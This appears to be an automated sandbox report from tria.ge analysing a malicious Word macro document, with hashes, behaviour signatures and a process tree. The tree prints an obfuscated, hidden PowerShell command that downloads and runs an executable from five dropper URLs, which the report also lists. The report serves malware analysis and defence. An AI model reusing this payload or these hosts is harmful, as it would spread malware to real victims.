Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 22:04

General

  • Target

    e1991d3ee7d915f0011c1630d633bd5aa6dbb81a34bbe3774a785579ee3a13c7.doc

  • Size

    200KB

  • MD5

    cf81ff54490d637bfa7b0bca5d8a1c89

  • SHA1

    724eff36db424daa8729d95b4b13573f4ce8bec2

  • SHA256

    e1991d3ee7d915f0011c1630d633bd5aa6dbb81a34bbe3774a785579ee3a13c7

  • SHA512

    458a2f1733998d6db2418278b16fd5a8e36b828f0e29501ea23c9c77566602c7727874340a614215871e2a18401881af4d112bb1b306ec746ca63d5eb6b8c5ae

  • SSDEEP

    3072:+HP9UaqFh5Hr/SzFaSadGBrjC48+WZ/POhh+/JY9a1Zfx4rIqz8aFGcI6kGX:+HP+aqhSzGdD48+aPOngqzxGcI6kG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://compworldinc.com/closed_731293_8C5UbKzD9nC/EeRWoAbaA/

exe.dropper

http://graphixagency.com/wp-cache/z40o2osj-6fzn-8077/

exe.dropper

http://hyderabadmoversandpackers.com/uh53e/CcTNon/

exe.dropper

http://landnewspal.com/8xohvc/UgDirz/

exe.dropper

http://freelancedigitales.com/keo/AZPQar/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e1991d3ee7d915f0011c1630d633bd5aa6dbb81a34bbe3774a785579ee3a13c7.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2308
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2704
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABDAHIAbwBrAHEAZgB0AHgAPQAnAFUAegBvAGEAaQByAGcAbQBvAGwAJwA7ACQARgBpAGEAbQBtAHoAagB5AHcAdQB2AHkAIAA9ACAAJwA3ADkAJwA7ACQAQwBoAHgAagB4AG0AZQBpAHEAcgA9ACcASABrAHAAbABnAGEAaQBnAG8AcgBtACcAOwAkAFoAZABvAHUAcQBxAHoAegB6AGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAaQBhAG0AbQB6AGoAeQB3AHUAdgB5ACsAJwAuAGUAeABlACcAOwAkAFEAZQBvAGkAagBzAHkAYwBmAG0APQAnAFcAdgBrAHgAZABlAGkAeQBuAGEAaABxACcAOwAkAFkAaABoAGwAZQBkAGQAbwB5AHAAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAYwBMAGkAZQBuAFQAOwAkAFAAagB1AGUAcQBoAHEAZgA9ACcAaAB0AHQAcAA6AC8ALwBjAG8AbQBwAHcAbwByAGwAZABpAG4AYwAuAGMAbwBtAC8AYwBsAG8AcwBlAGQAXwA3ADMAMQAyADkAMwBfADgAQwA1AFUAYgBLAHoARAA5AG4AQwAvAEUAZQBSAFcAbwBBAGIAYQBBAC8AKgBoAHQAdABwADoALwAvAGcAcgBhAHAAaABpAHgAYQBnAGUAbgBjAHkALgBjAG8AbQAvAHcAcAAtAGMAYQBjAGgAZQAvAHoANAAwAG8AMgBvAHMAagAtADYAZgB6AG4ALQA4ADAANwA3AC8AKgBoAHQAdABwADoALwAvAGgAeQBkAGUAcgBhAGIAYQBkAG0AbwB2AGUAcgBzAGEAbgBkAHAAYQBjAGsAZQByAHMALgBjAG8AbQAvAHUAaAA1ADMAZQAvAEMAYwBUAE4AbwBuAC8AKgBoAHQAdABwADoALwAvAGwAYQBuAGQAbgBlAHcAcwBwAGEAbAAuAGMAbwBtAC8AOAB4AG8AaAB2AGMALwBVAGcARABpAHIAegAvACoAaAB0AHQAcAA6AC8ALwBmAHIAZQBlAGwAYQBuAGMAZQBkAGkAZwBpAHQAYQBsAGUAcwAuAGMAbwBtAC8AawBlAG8ALwBBAFoAUABRAGEAcgAvACcALgAiAHMAcABsAGAAaQBUACIAKAAnACoAJwApADsAJABLAHQAdAB5AGwAdQBsAHoAaAA9ACcAWgBnAHoAcgBrAGMAeQBtAHMAawBlACcAOwBmAG8AcgBlAGEAYwBoACgAJABFAGcAaQBtAG8AdAB4AHQAIABpAG4AIAAkAFAAagB1AGUAcQBoAHEAZgApAHsAdAByAHkAewAkAFkAaABoAGwAZQBkAGQAbwB5AHAALgAiAEQAbwB3AE4AYABMAG8AYABBAGQAZgBJAGwARQAiACgAJABFAGcAaQBtAG8AdAB4AHQALAAgACQAWgBkAG8AdQBxAHEAegB6AHoAYwApADsAJABLAG4AZQBuAHYAcQB3AHgAaABjAD0AJwBJAGgAYQBpAGcAdwBvAGMAaAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFoAZABvAHUAcQBxAHoAegB6AGMAKQAuACIATABgAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADIAMwAyADIANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABaAGQAbwB1AHEAcQB6AHoAegBjACkAOwAkAEgAYwB4AGoAZQBoAHgAZwB3AGsAPQAnAFEAeQBkAHIAbABzAHIAZQByAG0AYgB2AHgAJwA7AGIAcgBlAGEAawA7ACQATgBwAHYAYgBnAHAAdgBnAHQAcwA9ACcAQQBlAGIAaQB5AHQAYwByAGkAcwB4AHEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwByAHYAYgBjAG0AegB2AGsAcQA9ACcASABpAHYAcwBrAHoAeQB5AHIAYQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A53F454.wmf

      Filesize

      444B

      MD5

      40b48f27ec2de1b2ac37a7789116ff63

      SHA1

      0aa853e28831b52bf3b83399bc527d816b132f98

      SHA256

      24c0c105306ecf0b5b8250d635605644995c2c6e3c8dcbe8f5d3421405429550

      SHA512

      5670f5707288c73ca3e8ba2851a56186a2e194a8b31e918ac5e3fe979cb6f5a53fe61968760670e94b16b7fdbb5868b3f27ebd6af6700020274098b51f522e86

    • memory/2308-16-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-22-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-5-0x0000000005B50000-0x0000000005C50000-memory.dmp

      Filesize

      1024KB

    • memory/2308-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2308-14-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-13-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-12-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-0-0x000000002F451000-0x000000002F452000-memory.dmp

      Filesize

      4KB

    • memory/2308-2-0x0000000070B7D000-0x0000000070B88000-memory.dmp

      Filesize

      44KB

    • memory/2308-21-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

    • memory/2308-15-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-25-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

    • memory/2308-42-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2308-41-0x0000000005F40000-0x0000000006040000-memory.dmp

      Filesize

      1024KB

    • memory/2308-39-0x0000000070B7D000-0x0000000070B88000-memory.dmp

      Filesize

      44KB

    • memory/2308-40-0x0000000000560000-0x0000000000660000-memory.dmp

      Filesize

      1024KB

    • memory/2756-32-0x0000000001F70000-0x0000000001F78000-memory.dmp

      Filesize

      32KB

    • memory/2756-31-0x000000001B500000-0x000000001B7E2000-memory.dmp

      Filesize

      2.9MB